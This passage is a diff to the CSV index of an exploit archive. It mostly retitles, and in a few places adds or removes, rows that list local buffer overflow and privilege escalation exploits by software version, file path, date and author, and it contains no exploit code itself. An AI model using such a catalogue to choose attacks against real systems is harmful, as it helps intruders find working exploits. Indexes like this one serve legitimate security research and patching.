leahy",windows,local,0 +12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - '.wav' Local Overflow",2010-04-02,"Richard leahy",windows,local,0 12024,platforms/windows/local/12024.php,"Zip Unzip 6.0 - '.zip' Stack Buffer Overflow (PoC)",2010-04-03,mr_me,windows,local,0 12035,platforms/windows/local/12035.pl,"ZipScan 2.2c - Overflow (SEH)",2010-04-03,"Lincoln & corelanc0d3r",windows,local,0 12051,platforms/windows/local/12051.php,"PHP 6.0 Dev - 'str_transliterate()' Buffer Overflow",2010-04-04,"Yakir Wizman",windows,local,0 
@@ -6870,7 +6889,7 @@ id,file,description,date,author,platform,type,port 14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0 14215,platforms/windows/local/14215.txt,"SasCam 2.7 - ActiveX Head Buffer Overflow",2010-07-05,blake,windows,local,0 14256,platforms/windows/local/14256.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovwebsnmpsrv.exe' Buffer Overflow (SEH)",2010-07-07,bitform,windows,local,0 -14258,platforms/windows/local/14258.py,"GSM SIM Utility 5.15 - Direct RET Local",2010-07-07,chap0,windows,local,0 +14258,platforms/windows/local/14258.py,"GSM SIM Utility 5.15 - Direct RET Overflow",2010-07-07,chap0,windows,local,0 14339,platforms/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)",2010-07-12,anonymous,linux,local,0 14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - Multiple OS ASLR + DEP Bypass (SEH) (Metasploit)",2010-07-13,Node,windows,local,0 14361,platforms/windows/local/14361.py,"Microsoft Excel - 0x5D record Stack Overflow (MS10-038)",2010-07-14,webDEViL,windows,local,0 
@@ -6889,7 +6908,7 @@ id,file,description,date,author,platform,type,port 14527,platforms/windows/local/14527.pl,"WM Downloader 3.1.2.2 - Buffer Overflow (1)",2010-08-02,s-dz,windows,local,0 14532,platforms/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Cnvrtr - Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",windows,local,0 14538,platforms/ios/local/14538.txt,"Apple iOS - '.pdf' Jailbreak",2010-08-03,jailbreakme,ios,local,0 -14550,platforms/windows/local/14550.py,"Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram'",2010-08-04,"Oh Yaw Theng",windows,local,0 +14550,platforms/windows/local/14550.py,"Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram' Local Overflow",2010-08-04,"Oh Yaw Theng",windows,local,0 14566,platforms/windows/local/14566.c,"Microsoft Windows - 'win32k.sys' Driver 'CreateDIBPalette()' Buffer Overflow",2010-08-06,Arkon,windows,local,0 14576,platforms/windows/local/14576.c,"Mini-stream Ripper 3.1.2.1 - Buffer Overflow (DEP Bypass)",2010-08-07,"fl0 fl0w",windows,local,0 14581,platforms/windows/local/14581.py,"myMP3-Player 3.0 - Buffer Overflow",2010-08-08,"Oh Yaw Theng",windows,local,0 
@@ -6992,7 +7011,6 @@ id,file,description,date,author,platform,type,port 15206,platforms/bsd/local/15206.c,"FreeBSD - 'pseudofs' Null Pointer Dereference Privilege Escalation",2010-10-04,"Babcia Padlina",bsd,local,0 15285,platforms/linux/local/15285.c,"Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0 15599,platforms/windows/local/15599.py,"Xion Audio Player 1.0.127 - '.m3u' Buffer Overflow",2010-11-23,0v3r,windows,local,0 -15245,platforms/solaris/local/15245.txt,"Oracle Solaris - 'su' Local",2010-10-13,prdelka,solaris,local,0 15609,platforms/windows/local/15609.txt,"Microsoft Windows Vista/7 - Privilege Escalation (UAC Bypass)",2010-11-24,noobpwnftw,windows,local,0 15274,platforms/linux/local/15274.txt,"GNU C library dynamic linker - '$ORIGIN' Expansion",2010-10-18,"Tavis Ormandy",linux,local,0 15279,platforms/windows/local/15279.rb,"Fat Player 0.6b - '.wav' Buffer Overflow (SEH)",2010-10-18,"James Fitts",windows,local,0 
@@ -7026,7 +7044,7 @@ id,file,description,date,author,platform,type,port 15630,platforms/windows/local/15630.py,"Mediacoder 0.7.5.4792 - Buffer Overflow (SEH)",2010-11-29,0v3r,windows,local,0 15663,platforms/windows/local/15663.py,"Mediacoder 0.7.5.4797 - '.m3u' Buffer Overflow (SEH)",2010-12-02,"Oh Yaw Theng",windows,local,0 15692,platforms/windows/local/15692.py,"Video Charge Studio 2.9.5.643 - '.vsc' Buffer Overflow (SEH)",2010-12-06,"xsploited security",windows,local,0 -15693,platforms/windows/local/15693.html,"Viscom VideoEdit Gold ActiveX 8.0 - Remote Code Execution",2010-12-06,Rew,windows,local,0 +15693,platforms/windows/local/15693.html,"Viscom VideoEdit Gold ActiveX 8.0 - Code Execution",2010-12-06,Rew,windows,local,0 15696,platforms/windows/local/15696.txt,"Alice 2.2 - Arbitrary Code Execution",2010-12-06,Rew,windows,local,0 15704,platforms/linux/local/15704.c,"Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0 15706,platforms/windows/local/15706.txt,"Winamp 5.6 - 'MIDI Parser' Arbitrary Code Execution",2010-12-08,"Kryptos Logic",windows,local,0 
@@ -7043,7 +7061,7 @@ id,file,description,date,author,platform,type,port 15774,platforms/linux/local/15774.c,"Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Privilege Escalation",2010-12-18,"Jon Oberheide",linux,local,0 15782,platforms/windows/local/15782.pl,"Word Splash Pro 9.5 - Buffer Overflow",2010-12-20,h1ch4m,windows,local,0 15785,platforms/windows/local/15785.py,"MP3 CD Converter Professional - Buffer Overflow (SEH)",2010-12-20,"C4SS!0 G0M3S",windows,local,0 -15855,platforms/windows/local/15855.py,"Digital Music Pad 8.2.3.4.8 - '.pls' Overflow (SEH)",2010-12-29,"Abhishek Lyall",windows,local,0 +15855,platforms/windows/local/15855.py,"Digital Music Pad 8.2.3.4.8 - '.pls' Local Overflow (SEH)",2010-12-29,"Abhishek Lyall",windows,local,0 15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 - DEP Bypass",2011-01-02,blake,windows,local,0 15888,platforms/windows/local/15888.c,"Bywifi 2.8.1 - Stack Buffer Overflow",2011-01-01,anonymous,windows,local,0 15901,platforms/windows/local/15901.py,"Music Animation Machine MIDI Player - Buffer Overflow (SEH)",2011-01-04,Acidgen,windows,local,0 
@@ -7137,7 +7155,7 @@ id,file,description,date,author,platform,type,port 16664,platforms/windows/local/16664.rb,"gAlan 0.2.1 - Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 16665,platforms/windows/local/16665.rb,"Microsoft PowerPoint Viewer - TextBytesAtom Stack Buffer Overflow (MS10-004) (Metasploit)",2010-09-25,Metasploit,windows,local,0 16666,platforms/windows/local/16666.rb,"UltraISO - '.CCD' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0 -16667,platforms/windows/local/16667.rb,"Adobe Flash Player - 'Button' Remote Code Execution (Metasploit)",2010-11-01,Metasploit,windows,local,0 +16667,platforms/windows/local/16667.rb,"Adobe Flash Player - 'Button' Arbitrary Code Execution (Metasploit)",2010-11-01,Metasploit,windows,local,0 16668,platforms/windows/local/16668.rb,"BACnet OPC Client - Buffer Overflow (Metasploit) (2)",2010-11-14,Metasploit,windows,local,0 16669,platforms/windows/local/16669.rb,"Adobe Illustrator CS4 14.0.0 - Postscript (.eps) Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16670,platforms/windows/local/16670.rb,"Adobe Acrobat - Bundled LibTIFF Integer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 
@@ -7169,7 +7187,7 @@ id,file,description,date,author,platform,type,port 16999,platforms/windows/local/16999.rb,"POP Peeper 3.7 - Overflow (SEH)",2011-03-18,"Anastasios Monachos",windows,local,0 17001,platforms/windows/local/17001.pl,"CORE MultiMedia Suite 2011 CORE Player 2.4 - '.m3u' Buffer Overflow",2011-03-18,Rh0,windows,local,0 17012,platforms/windows/local/17012.py,"Mediacoder 2011 RC3 - '.m3u' Buffer Overflow",2011-03-20,"Oh Yaw Theng",windows,local,0 -17013,platforms/windows/local/17013.pl,"MPlayer Lite r33064 - '.m3u' Overflow (SEH)",2011-03-20,"C4SS!0 & h1ch4m",windows,local,0 +17013,platforms/windows/local/17013.pl,"MPlayer Lite r33064 - '.m3u' Local Overflow (SEH)",2011-03-20,"C4SS!0 & h1ch4m",windows,local,0 17064,platforms/windows/local/17064.py,"IDEAL Administration 2011 11.4 - Local Buffer Overflow (SEH)",2011-03-29,Dr_IDE,windows,local,0 17083,platforms/linux/local/17083.pl,"HT Editor 2.0.18 - File Opening Stack Overflow",2011-03-30,ZadYree,linux,local,0 17086,platforms/windows/local/17086.pl,"Word List Builder - Buffer Overflow (SEH)",2011-04-01,h1ch4m,windows,local,0 
@@ -7260,7 +7278,7 @@ id,file,description,date,author,platform,type,port 17932,platforms/linux/local/17932.c,"PolicyKit polkit-1 < 0.101 - Privilege Escalation",2011-10-05,zx2c4,linux,local,0 17939,platforms/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass",2011-10-07,modpr0be,windows,local,0 17942,platforms/linux/local/17942.c,"pkexec - Race Condition Privilege Escalation",2011-10-08,xi4oyu,linux,local,0 -17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate - '.PLP' File 'id' Overflow (Metasploit)",2011-10-10,Metasploit,windows,local,0 +17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate - '.PLP' File 'id' Local Overflow (Metasploit)",2011-10-10,Metasploit,windows,local,0 17967,platforms/windows/local/17967.rb,"TugZip 3.5 Archiver - '.ZIP' File Parsing Buffer Overflow (Metasploit)",2011-10-11,Metasploit,windows,local,0 17985,platforms/windows/local/17985.rb,"Real Networks Netzip Classic 7.5.1 86 - File Parsing Buffer Overflow (Metasploit)",2011-10-16,Metasploit,windows,local,0 18040,platforms/linux/local/18040.c,"Xorg 1.4 < 1.11.2 - File Permission Change (PoC)",2011-10-28,vladz,linux,local,0 
@@ -7335,11 +7353,12 @@ id,file,description,date,author,platform,type,port 18947,platforms/windows/local/18947.rb,"ispVM System - '.XCF' File Handling Overflow (Metasploit)",2012-05-29,Metasploit,windows,local,0 18954,platforms/windows/local/18954.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (Metasploit)",2012-05-30,Metasploit,windows,local,0 18959,platforms/multiple/local/18959.txt,"Browsers Browsers - Navigation Download Trick",2012-05-31,"Michal Zalewski",multiple,local,0 -19006,platforms/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 - '.PAC' Overflow",2012-06-07,b33f,windows,local,0 +19006,platforms/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 - '.PAC' Local Overflow",2012-06-07,b33f,windows,local,0 19037,platforms/windows/local/19037.rb,"Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005) (Metasploit)",2012-06-11,Metasploit,windows,local,0 19041,platforms/aix/local/19041.txt,"Digital Ultrix 4.0/4.1 - '/usr/bin/chroot' Privilege Escalation",1991-05-01,anonymous,aix,local,0 19042,platforms/solaris/local/19042.txt,"SunOS 4.1.1 - '/usr/release/bin/makeinstall' Privilege Escalation",1999-11-23,anonymous,solaris,local,0 19043,platforms/aix/local/19043.txt,"SunOS 4.1.1 - '/usr/release/bin/winstall' Privilege Escalation",1999-11-12,anonymous,aix,local,0 +19045,platforms/aix/local/19045.txt,"SunOS 4.1.3 - '/etc/crash' SetGID kmem Privilege Escalation",1993-02-03,anonymous,aix,local,0 19066,platforms/irix/local/19066.txt,"SGI IRIX 5.3/6.2 / SGI license_oeo 1.0 LicenseManager - 'NETLS_LICENSE_FILE' Privilege Escalation",1996-04-05,"Arthur Hagen",irix,local,0 19067,platforms/irix/local/19067.txt,"SGI IRIX 6.4 / SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - 'LICENSEMGR_FILE_ROOT' Privilege Escalation",1996-11-22,"Yuri Volobuev",irix,local,0 19068,platforms/unix/local/19068.txt,"Digital UNIX 4.0/4.0 B/4.0 D - SUID/SGID Core File",1998-04-06,"ru5ty & SoReN",unix,local,0 
@@ -7357,33 +7376,32 @@ id,file,description,date,author,platform,type,port 19122,platforms/linux/local/19122.txt,"Slackware Linux 3.5 - '/etc/group' Privilege Escalation",1998-07-13,"Richard Thomas",linux,local,0 19125,platforms/linux/local/19125.txt,"Oracle 8 - oratclsh Suid",1999-04-29,"Dan Sugalski",linux,local,0 19126,platforms/solaris/local/19126.txt,"Sun Solaris 2.6 - power management",1998-07-16,"Ralf Lehmann",solaris,local,0 -19128,platforms/solaris/local/19128.c,"Sun Solaris 7.0 - '/usr/dt/bin/sdtcm_convert' Overflow / Privilege Escalation",1998-10-23,UNYUN,solaris,local,0 +19128,platforms/solaris/local/19128.c,"Sun Solaris 7.0 - '/usr/dt/bin/sdtcm_convert' Local Overflow / Privilege Escalation",1998-10-23,UNYUN,solaris,local,0 19138,platforms/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",windows,local,0 19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption",2012-06-14,"Felipe Andres Manzano",multiple,local,0 19142,platforms/linux/local/19142.sh,"Oracle 8 - File Access",1999-05-06,"Kevin Wenchel",linux,local,0 -19143,platforms/windows/local/19143.c,"Microsoft Windows - 'April Fools 2001'",1999-01-07,"Richard M. Smith",windows,local,0 +19143,platforms/windows/local/19143.c,"Microsoft Windows - 'April Fools 2001' Set Incorrect Date",1999-01-07,"Richard M. Smith",windows,local,0 19144,platforms/windows/local/19144.txt,"Microsoft Zero Administration Kit (ZAK) 1.0 / Office97 - Backdoor Access",1999-01-07,"Satu Laksela",windows,local,0 19145,platforms/windows/local/19145.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4 - Server Operator to Administrator Privilege Escalation: System Key",1999-01-11,Mnemonix,windows,local,0 19146,platforms/linux/local/19146.sh,"DataLynx suGuard 1.0 - Privilege Escalation",1999-01-03,"Dr. 
Mudge",linux,local,0 19158,platforms/solaris/local/19158.c,"Sun Solaris 2.5.1 PAM / unix_scheme - 'passwd' Privilege Escalation",1997-02-25,"Cristian Schipor",solaris,local,0 19159,platforms/solaris/local/19159.c,"Solaris 2.5.1 - 'ffbconfig' Privilege Escalation",1997-02-10,"Cristian Schipor",solaris,local,0 19160,platforms/solaris/local/19160.c,"Solaris 2.5.1 - 'chkey' Privilege Escalation",1997-05-19,"Adam Morrison",solaris,local,0 -19161,platforms/solaris/local/19161.txt,"Solaris 2.5.1 - 'Ping'",1997-06-15,"Adam Caldwell",solaris,local,0 19163,platforms/irix/local/19163.sh,"SGI IRIX 6.4 - 'ioconfig' Privilege Escalation",1998-07-20,Loneguard,irix,local,0 19167,platforms/windows/local/19167.txt,"Ipswitch IMail 5.0 / Ipswitch WS_FTP Server 1.0.1/1.0.2 - Privilege Escalation",1999-02-04,Marc,windows,local,0 19168,platforms/unix/local/19168.sh,"SGI IRIX 6.5.4 / Solaris 2.5.1 - ps(1) Buffer Overflow",1997-04-28,"Joe Zbiciak",unix,local,0 -19172,platforms/unix/local/19172.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - 'xlock' Overflow / Privilege Escalation (1)",1997-04-26,cesaro,unix,local,0 +19172,platforms/unix/local/19172.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - 'xlock' Local Overflow / Privilege Escalation (1)",1997-04-26,cesaro,unix,local,0 19173,platforms/unix/local/19173.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - '/usr/bin/X11/xlock' Privilege Escalation (2)",1997-04-26,BeastMaster,unix,local,0 19175,platforms/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 - Symbol Value Buffer Overflow (Metasploit)",2012-06-17,Metasploit,windows,local,0 19176,platforms/windows/local/19176.rb,"TFM MMPlayer - '.m3u' / '.ppl' Buffer Overflow (Metasploit)",2012-06-15,Metasploit,windows,local,0 19192,platforms/windows/local/19192.txt,"Hancom Office 2007 - 'Reboot.ini' Clear-Text 
Passwords",1999-02-09,"Russ Cooper",windows,local,0 19195,platforms/windows/local/19195.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 - LSA Secrets",1997-07-16,"Paul Ashton",windows,local,0 -19196,platforms/windows/local/19196.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Dial-up Networking 'Save Password'",1998-03-19,"Martin Dolphin",windows,local,0 +19196,platforms/windows/local/19196.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Dial-up Networking Save Password",1998-03-19,"Martin Dolphin",windows,local,0 19198,platforms/windows/local/19198.txt,"Microsoft Windows NT 4.0 SP4 - Known DLL Cache",1999-02-18,L0pht,windows,local,0 19199,platforms/solaris/local/19199.c,"Solaris 2.5.1 - 'automount' Privilege Escalation",1997-11-26,anonymous,solaris,local,0 -19200,platforms/unix/local/19200.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Overflow / Privilege Escalation (1)",1997-08-25,bloodmask,unix,local,0 -19201,platforms/unix/local/19201.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Overflow / Privilege Escalation (2)",1997-08-25,jGgM,unix,local,0 -19202,platforms/unix/local/19202.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Overflow / Privilege Escalation (3)",1997-08-25,jGgM,unix,local,0 +19200,platforms/unix/local/19200.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (1)",1997-08-25,bloodmask,unix,local,0 +19201,platforms/unix/local/19201.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / 
Privilege Escalation (2)",1997-08-25,jGgM,unix,local,0 +19202,platforms/unix/local/19202.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (3)",1997-08-25,jGgM,unix,local,0 19203,platforms/unix/local/19203.c,"BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - 'rlogin' Privilege Escalation",1996-12-04,"Roger Espel Llima",unix,local,0 19205,platforms/solaris/local/19205.c,"Sun Solaris 7.0 - '/usr/dt/bin/dtprintinfo' Buffer Overflow",1999-05-10,UNYUN@ShadowPenguin,solaris,local,0 19206,platforms/solaris/local/19206.c,"Sun Solaris 7.0 - '/usr/bin/lpset' Buffer Overflow",1999-05-11,"kim yong-jun",solaris,local,0 
@@ -7395,34 +7413,34 @@ id,file,description,date,author,platform,type,port 19215,platforms/aix/local/19215.c,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (3)",1999-05-22,UNYUN,aix,local,0 19216,platforms/aix/local/19216.c,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (4)",1999-05-22,ahmed@securityfocus.com,aix,local,0 19217,platforms/aix/local/19217.c,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (5)",1999-05-22,UNYUN,aix,local,0 -19220,platforms/windows/local/19220.c,"Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE'",1998-05-19,"Matt Chapman",windows,local,0 +19220,platforms/windows/local/19220.c,"Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Decrypt Pages",1998-05-19,"Matt Chapman",windows,local,0 19227,platforms/windows/local/19227.txt,"IBM Remote Control Software 1.0 - Code Execution",1999-05-10,"Thomas Krug",windows,local,0 19229,platforms/aix/local/19229.txt,"IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation",1999-05-25,"Paul Cammidge",aix,local,0 19232,platforms/solaris/local/19232.txt,"SunOS 4.1.4 - arp(8c) Memory Dump",1994-02-01,anonymous,solaris,local,0 19233,platforms/solaris/local/19233.txt,"Solaris 7.0 - aspppd Insecure Temporary File Creation",1996-12-20,Al-Herbish,solaris,local,0 19234,platforms/solaris/local/19234.c,"Solaris 7.0 - 'cancel' Privilege Escalation",1999-03-05,"Josh A. Strickland",solaris,local,0 -19235,platforms/solaris/local/19235.txt,"Solaris 7.0 - 'chkperm'",1996-12-05,"Kevin L Prigge",solaris,local,0 +19235,platforms/solaris/local/19235.txt,"Solaris 7.0 - 'chkperm' Privilege Escalation",1996-12-05,"Kevin L Prigge",solaris,local,0 19240,platforms/linux/local/19240.c,"Caldera kdenetwork 1.1.1-1 / Caldera OpenLinux 1.3/2.2 / KDE KDE 1.1/1.1. / RedHat Linux 6.0 - K-Mail File Creation",1999-06-09,"Brian Mitchell",linux,local,0 19243,platforms/linux/local/19243.txt,"G. 
Wilford man 2.3.10 - Symlink",1999-06-02,"Thomas Fischbacher",linux,local,0 19244,platforms/osx/local/19244.sh,"Apple Mac OSX Server 10.0 - Overload",1999-06-03,"Juergen Schmidt",osx,local,0 19249,platforms/linux/local/19249.c,"Xcmail 0.99.6 - Buffer Overflow",1999-03-02,Arthur,linux,local,0 19401,platforms/windows/local/19401.txt,"Apple QuickTime - QuickTime.util.QTByteObject Initialization Security Checks Bypass",2012-06-26,"Security Explorations",windows,local,0 -19254,platforms/linux/local/19254.c,"S.u.S.E. Linux 5.2 - 'gnuplot'",1999-03-04,xnec,linux,local,0 +19254,platforms/linux/local/19254.c,"S.u.S.E Linux 5.2 - 'gnuplot' Local Overflow / Privilege Escalation",1999-03-04,xnec,linux,local,0 19255,platforms/linux/local/19255.txt,"RedHat Linux 5.2 i386/6.0 - No Logging",1999-06-09,"Tani Hosokawa",linux,local,0 19256,platforms/linux/local/19256.c,"Stanford University bootpd 2.4.3 / Debian 2.0 - netstd",1999-01-03,anonymous,linux,local,0 19257,platforms/linux/local/19257.c,"X11R6 3.3.3 - Symlink",1999-03-21,Stealthf0rk,linux,local,0 19258,platforms/solaris/local/19258.sh,"Sun Solaris 7.0 - 'ff.core' Privilege Escalation",1999-01-07,"John McDonald",solaris,local,0 -19259,platforms/linux/local/19259.c,"S.u.S.E. 
5.2 - 'lpc' Privilege Escalation",1999-02-03,xnec,linux,local,0 +19259,platforms/linux/local/19259.c,"S.u.S.E Linux 5.2 - 'lpc' Privilege Escalation",1999-02-03,xnec,linux,local,0 19260,platforms/irix/local/19260.sh,"SGI IRIX 6.2 - '/usr/lib/netaddpr' Privilege Escalation",1997-05-09,"Jaechul Choe",irix,local,0 -19261,platforms/netbsd_x86/local/19261.txt,"NetBSD 1.3.2 / SGI IRIX 6.5.1 - 'at(1)'",1998-06-27,Gutierrez,netbsd_x86,local,0 +19261,platforms/netbsd_x86/local/19261.txt,"NetBSD 1.3.2 / SGI IRIX 6.5.1 - 'at(1)' Read File",1998-06-27,Gutierrez,netbsd_x86,local,0 19262,platforms/irix/local/19262.txt,"SGI IRIX 6.2 - 'cdplayer' Privilege Escalation",1996-11-21,"Yuri Volobuev",irix,local,0 19267,platforms/irix/local/19267.c,"SGI IRIX 6.3 - xrm Buffer Overflow",1997-05-27,"David Hedley",irix,local,0 19268,platforms/irix/local/19268.txt,"SGI IRIX 5.3 - 'Cadmin' Privilege Escalation",1996-08-06,"Grant Kaufmann",irix,local,0 -19269,platforms/irix/local/19269.txt,"SGI IRIX 6.0.1 - 'colorview'",1995-02-09,"Dave Sill",irix,local,0 +19269,platforms/irix/local/19269.txt,"SGI IRIX 6.0.1 - 'colorview' Read Files",1995-02-09,"Dave Sill",irix,local,0 19270,platforms/linux/local/19270.c,"Debian 2.0 - Super Syslog Buffer Overflow",1999-02-25,c0nd0r,linux,local,0 -19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 - 'day5notifier'",1997-05-16,"Mike Neuman",irix,local,0 +19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 - 'day5notifier' Privilege Escalation",1997-05-16,"Mike Neuman",irix,local,0 19274,platforms/irix/local/19274.c,"SGI IRIX 6.3 - 'df' Privilege Escalation",1997-05-24,"David Hedley",irix,local,0 -19275,platforms/irix/local/19275.txt,"SGI IRIX 6.4 - 'datman'/'cdman'",1996-12-09,"Yuri Volobuev",irix,local,0 +19275,platforms/irix/local/19275.txt,"SGI IRIX 6.4 - 'datman'/'cdman' Privilege Escalation",1996-12-09,"Yuri Volobuev",irix,local,0 19276,platforms/irix/local/19276.c,"SGI IRIX 6.2 - 'eject' Privilege Escalation (1)",1997-05-25,DCRH,irix,local,0 
19277,platforms/irix/local/19277.c,"SGI IRIX 6.2 - 'eject' Privilege Escalation (2)",1997-05-25,"Last Stage of Delirium",irix,local,0 19279,platforms/linux/local/19279.sh,"RedHat Linux 2.1 - 'abuse.console' Privilege Escalation",1996-02-02,"David J Meltzer",linux,local,0 @@ -7442,7 +7460,7 @@ id,file,description,date,author,platform,type,port 19306,platforms/aix/local/19306.c,"IBM AIX 4.2.1 - '/usr/bin/portmir' Buffer Overflow / Insecure Temporary File Creation",1997-10-29,"BM ERS Team",aix,local,0 19307,platforms/aix/local/19307.c,"IBM AIX 4.2 - 'ping' Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0 19309,platforms/aix/local/19309.c,"IBM AIX 4.2 - '/usr/sbin/lchangelv' Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0 -19310,platforms/irix/local/19310.c,"SGI IRIX 6.4 - 'login'",1997-05-26,"David Hedley",irix,local,0 +19310,platforms/irix/local/19310.c,"SGI IRIX 6.4 - 'login' Privilege Escalation",1997-05-26,"David Hedley",irix,local,0 19311,platforms/linux/local/19311.c,"RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 - 'mailx' (1)",1998-06-20,"Alvaro Martinez Echevarria",linux,local,0 19312,platforms/linux/local/19312.c,"RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 - 'mailx' (2)",1998-06-25,segv,linux,local,0 19313,platforms/irix/local/19313.txt,"SGI IRIX 6.4 - 'netprint' Privilege Escalation",1997-01-04,"Yuri Volobuev",irix,local,0 
@@ -7461,11 +7479,11 @@ id,file,description,date,author,platform,type,port 19345,platforms/aix/local/19345.txt,"IBM AIX 4.2.1 - 'lquerypv' File Read",1996-11-24,Aleph1,aix,local,0 19346,platforms/freebsd/local/19346.c,"FreeBSD 3.1 / Solaris 2.6 - Domain Socket",1997-06-19,"Thamer Al-Herbish",freebsd,local,0 19347,platforms/irix/local/19347.c,"SGI IRIX 6.3 - 'pset' Privilege Escalation",1997-07-17,"Last Stage of Delirium",irix,local,0 -19349,platforms/irix/local/19349.txt,"SGI IRIX 6.4 - 'rmail'",1997-05-07,"Yuri Volobuev",irix,local,0 +19349,platforms/irix/local/19349.txt,"SGI IRIX 6.4 - 'rmail' Privilege Escalation",1997-05-07,"Yuri Volobuev",irix,local,0 19350,platforms/solaris/local/19350.sh,"Solaris 2.5.1 - License Manager",1998-10-21,"Joel Eriksson",solaris,local,0 19351,platforms/irix/local/19351.sh,"SGI IRIX 5.2/5.3 - 'serial_ports' Privilege Escalation",1994-02-02,transit,irix,local,0 19353,platforms/irix/local/19353.txt,"SGI IRIX 6.4 - 'suid_exec' Privilege Escalation",1996-12-02,"Yuri Volobuev",irix,local,0 -19354,platforms/aix/local/19354.txt,"SGI IRIX 5.1/5.2 - 'sgihelp'",1996-12-02,anonymous,aix,local,0 +19354,platforms/aix/local/19354.txt,"SGI IRIX 5.1/5.2 - 'sgihelp' Privilege Escalation",1996-12-02,anonymous,aix,local,0 19355,platforms/irix/local/19355.txt,"SGI IRIX 6.4 - 'startmidi' Privilege Escalation",1997-02-09,"David Hedley",irix,local,0 19356,platforms/irix/local/19356.txt,"SGI IRIX 6.3 - 'Systour' / 'OutOfBox' Privilege Escalation",1996-10-30,"Tun-Hui 